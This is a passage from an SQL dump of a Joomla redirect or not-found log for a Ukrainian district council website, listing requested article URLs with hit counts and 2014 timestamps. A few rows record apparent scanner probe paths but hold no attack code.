00:00:00',301),(10513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=uk&Itemid=','','','',4,0,'2014-11-08 09:29:52','0000-00-00 00:00:00',301),(10514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 09:30:17','0000-00-00 00:00:00',301),(10515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 09:30:26','0000-00-00 00:00:00',301),(10516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47:-21022013-&Itemid=86&lang=uk','','','',1,0,'2014-11-08 09:33:47','0000-00-00 00:00:00',301),(10517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-08 09:33:50','0000-00-00 00:00:00',301),(10518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-11-08 11:09:55','0000-00-00 00:00:00',301),(10519,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=ru&Itemid=','','','',7,0,'2014-11-08 13:54:29','0000-00-00 00:00:00',301),(10520,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-08 13:54:33','0000-00-00 00:00:00',301),(10521,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-08 13:54:40','0000-00-00 00:00:00',301),(10522,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 13:54:42','0000-00-00 00:00:00',301),(10523,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 13:54:45','0000-00-00 00:00:00',301),(10524,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=uk&Itemid=','','','',6,0,'2014-11-08 13:54:51','0000-00-00 00:00:00',301),(10525,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-08 13:54:59','0000-00-00 00:00:00',301),(10526,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-08 13:55:03','0000-00-00 00:00:00',301),(10527,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 13:55:07','0000-00-00 00:00:00',301),(10528,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 13:55:09','0000-00-00 00:00:00',301),(10529,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-08 13:55:13','0000-00-00 00:00:00',301),(10530,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 13:55:15','0000-00-00 00:00:00',301),(10531,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-08 13:55:22','0000-00-00 00:00:00',301),(10532,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=ru&Itemid=','','','',4,0,'2014-11-08 13:55:27','0000-00-00 00:00:00',301),(10533,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 13:55:29','0000-00-00 00:00:00',301),(10534,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-08 13:55:31','0000-00-00 00:00:00',301),(10535,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 13:55:33','0000-00-00 00:00:00',301),(10536,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-08 13:55:42','0000-00-00 00:00:00',301),(10537,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 13:55:46','0000-00-00 00:00:00',301),(10538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=ru','','','',4,0,'2014-11-08 17:22:45','0000-00-00 00:00:00',301),(10539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-08 17:22:53','0000-00-00 00:00:00',301),(10540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-08 17:22:56','0000-00-00 00:00:00',301),(10541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:23:15','0000-00-00 00:00:00',301),(10542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:23:17','0000-00-00 00:00:00',301),(10543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=ru','','','',1,0,'2014-11-08 17:23:20','0000-00-00 00:00:00',301),(10544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:23:27','0000-00-00 00:00:00',301),(10545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-08 17:23:29','0000-00-00 00:00:00',301),(10546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:23:32','0000-00-00 00:00:00',301),(10547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-08 17:23:36','0000-00-00 00:00:00',301),(10548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:23:41','0000-00-00 00:00:00',301),(10549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54:--29112013-&Itemid=95&lang=ru','','','',1,0,'2014-11-08 17:23:51','0000-00-00 00:00:00',301),(10550,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47&Itemid=86&lang=ru','','','',5,0,'2014-11-08 17:40:53','0000-00-00 00:00:00',301),(10551,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-11-08 17:41:06','0000-00-00 00:00:00',301),(10552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-11-08 17:41:09','0000-00-00 00:00:00',301),(10553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=en','','','',1,0,'2014-11-08 17:42:03','0000-00-00 00:00:00',301),(10554,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-08 17:42:28','0000-00-00 00:00:00',301),(10555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=ru','','','',1,0,'2014-11-08 17:42:31','0000-00-00 00:00:00',301),(10556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:42:34','0000-00-00 00:00:00',301),(10557,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-08 17:42:36','0000-00-00 00:00:00',301),(10558,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=en','','','',1,0,'2014-11-08 17:43:15','0000-00-00 00:00:00',301),(10559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:43:24','0000-00-00 00:00:00',301),(10560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-08 17:43:26','0000-00-00 00:00:00',301),(10561,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=ru','','','',1,0,'2014-11-08 17:43:36','0000-00-00 00:00:00',301),(10562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:43:39','0000-00-00 00:00:00',301),(10563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-08 17:43:42','0000-00-00 00:00:00',301),(10564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-08 17:43:47','0000-00-00 00:00:00',301),(10565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=en','','','',1,0,'2014-11-08 17:44:08','0000-00-00 00:00:00',301),(10566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-08 17:44:11','0000-00-00 00:00:00',301),(10567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-08 17:44:14','0000-00-00 00:00:00',301),(10568,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:44:25','0000-00-00 00:00:00',301),(10569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-08 17:44:27','0000-00-00 00:00:00',301),(10570,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:44:44','0000-00-00 00:00:00',301),(10571,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-08 17:44:48','0000-00-00 00:00:00',301),(10572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:44:50','0000-00-00 00:00:00',301),(10573,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-08 17:44:53','0000-00-00 00:00:00',301),(10574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-08 17:45:00','0000-00-00 00:00:00',301),(10575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-08 17:45:02','0000-00-00 00:00:00',301),(10576,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:45:08','0000-00-00 00:00:00',301),(10577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-08 17:45:10','0000-00-00 00:00:00',301),(10578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:45:13','0000-00-00 00:00:00',301),(10579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=en&Itemid=0','','','',9,0,'2014-11-08 17:45:18','0000-00-00 00:00:00',301),(10580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:45:23','0000-00-00 00:00:00',301),(10581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:45:28','0000-00-00 00:00:00',301),(10582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-08 17:45:33','0000-00-00 00:00:00',301),(10583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-08 17:45:36','0000-00-00 00:00:00',301),(10584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-08 17:45:41','0000-00-00 00:00:00',301),(10585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-08 17:45:49','0000-00-00 00:00:00',301),(10586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:45:52','0000-00-00 00:00:00',301),(10587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-08 17:45:54','0000-00-00 00:00:00',301),(10588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=ru','','','',7,0,'2014-11-08 17:46:08','0000-00-00 00:00:00',301),(10589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-08 17:46:19','0000-00-00 00:00:00',301),(10590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-08 17:46:37','0000-00-00 00:00:00',301),(10591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-08 17:46:40','0000-00-00 00:00:00',301),(10592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-08 17:46:45','0000-00-00 00:00:00',301),(10593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-08 17:46:53','0000-00-00 00:00:00',301),(10594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-08 17:46:56','0000-00-00 00:00:00',301),(10595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=en','','','',1,0,'2014-11-08 17:47:10','0000-00-00 00:00:00',301),(10596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=en&Itemid=0','','','',1,0,'2014-11-08 17:47:15','0000-00-00 00:00:00',301),(10597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=ru&Itemid=0','','','',1,0,'2014-11-08 17:47:18','0000-00-00 00:00:00',301),(10598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15&lang=uk&Itemid=0','','','',1,0,'2014-11-08 17:47:21','0000-00-00 00:00:00',301),(10599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-11-08 17:48:03','0000-00-00 00:00:00',301),(10600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-08 17:48:17','0000-00-00 00:00:00',301),(10601,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-08 19:29:14','0000-00-00 00:00:00',301),(10602,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=0&lang=en','','','',4,0,'2014-11-08 21:51:32','0000-00-00 00:00:00',301),(10603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=en','','','',1,0,'2014-11-08 22:01:09','0000-00-00 00:00:00',301),(10604,'http://malyn-rayrada.org.ua/engine/ajax/pm.php','','','',1,0,'2014-11-09 01:39:58','0000-00-00 00:00:00',301),(10605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=en&Itemid=','','','',5,0,'2014-11-09 01:43:08','0000-00-00 00:00:00',301),(10606,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-09 01:56:00','0000-00-00 00:00:00',301),(10607,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=en&Itemid=0','','','',4,0,'2014-11-09 02:10:36','0000-00-00 00:00:00',301),(10608,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-09 02:30:25','0000-00-00 00:00:00',301),(10609,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-09 03:00:24','0000-00-00 00:00:00',301),(10610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-09 03:00:29','0000-00-00 00:00:00',301),(10611,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-09 03:04:19','0000-00-00 00:00:00',301),(10612,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-09 05:03:50','0000-00-00 00:00:00',301),(10613,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-09 05:21:10','0000-00-00 00:00:00',301),(10614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-09 11:12:45','0000-00-00 00:00:00',301),(10615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=uk&Itemid=','','','',4,0,'2014-11-09 11:12:47','0000-00-00 00:00:00',301),(10616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=0&lang=en','','','',1,0,'2014-11-09 11:12:49','0000-00-00 00:00:00',301),(10617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=0&lang=ru','','','',1,0,'2014-11-09 11:12:52','0000-00-00 00:00:00',301),(10618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=0&lang=uk','','','',1,0,'2014-11-09 11:12:54','0000-00-00 00:00:00',301),(10619,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51&Itemid=92&lang=uk','','','',1,0,'2014-11-09 17:59:48','0000-00-00 00:00:00',301),(10620,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56&Itemid=97&lang=uk','','','',5,0,'2014-11-09 19:05:39','0000-00-00 00:00:00',301),(10621,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=uk','','','',2,0,'2014-11-09 19:06:23','0000-00-00 00:00:00',301),(10622,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49&Itemid=88&lang=uk','','','',2,0,'2014-11-09 21:04:05','0000-00-00 00:00:00',301),(10623,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-11-09 21:36:06','0000-00-00 00:00:00',301),(10624,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-11-09 22:14:45','0000-00-00 00:00:00',301),(10625,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-11-09 22:15:33','0000-00-00 00:00:00',301),(10626,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=uk','','','',5,0,'2014-11-09 23:43:29','0000-00-00 00:00:00',301),(10627,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=uk','','','',2,0,'2014-11-09 23:46:27','0000-00-00 00:00:00',301),(10628,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-11-10 00:04:17','0000-00-00 00:00:00',301),(10629,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-11-10 00:25:07','0000-00-00 00:00:00',301),(10630,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47&Itemid=86&lang=uk','','','',4,0,'2014-11-10 00:45:06','0000-00-00 00:00:00',301),(10631,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57&Itemid=98&lang=uk','','','',4,0,'2014-11-10 00:45:30','0000-00-00 00:00:00',301),(10632,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49&Itemid=88&lang=uk','','','',5,0,'2014-11-10 00:45:40','0000-00-00 00:00:00',301),(10633,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10&Itemid=17&lang=uk','','','',8,0,'2014-11-10 00:45:56','0000-00-00 00:00:00',301),(10634,'http://www.malyn-rayrada.org.ua/info/index.php','','','',1,0,'2014-11-10 00:52:59','0000-00-00 00:00:00',301),(10635,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-11-10 01:16:35','0000-00-00 00:00:00',301),(10636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-10 03:31:41','0000-00-00 00:00:00',301),(10637,'http://malyn-rayrada.org.ua/psitalia/components/com_community/index.html','','','',1,0,'2014-11-10 04:07:31','0000-00-00 00:00:00',301),(10638,'http://malyn-rayrada.org.ua/psitalia/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-10 04:07:35','0000-00-00 00:00:00',301),(10639,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-11-10 05:21:08','0000-00-00 00:00:00',301),(10640,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-11-10 05:34:34','0000-00-00 00:00:00',301),(10641,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-11-10 05:37:15','0000-00-00 00:00:00',301),(10642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-11-10 06:13:22','0000-00-00 00:00:00',301),(10643,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:13:23','0000-00-00 00:00:00',301),(10644,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=uk','','','',5,0,'2014-11-10 06:13:52','0000-00-00 00:00:00',301),(10645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:14:01','0000-00-00 00:00:00',301),(10646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:15:11','0000-00-00 00:00:00',301),(10647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:15:53','0000-00-00 00:00:00',301),(10648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1219:-2004-&lang=uk','','','',1,0,'2014-11-10 06:15:58','0000-00-00 00:00:00',301),(10649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:16:10','0000-00-00 00:00:00',301),(10650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&Itemid=14&lang=en','','','',1,0,'2014-11-10 06:17:55','0000-00-00 00:00:00',301),(10651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:18:33','0000-00-00 00:00:00',301),(10652,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:18:39','0000-00-00 00:00:00',301),(10653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:19:25','0000-00-00 00:00:00',301),(10654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:19:30','0000-00-00 00:00:00',301),(10655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:19:46','0000-00-00 00:00:00',301),(10656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-11-10 06:19:46','0000-00-00 00:00:00',301),(10657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&Itemid=14&lang=uk','','','',1,0,'2014-11-10 06:20:09','0000-00-00 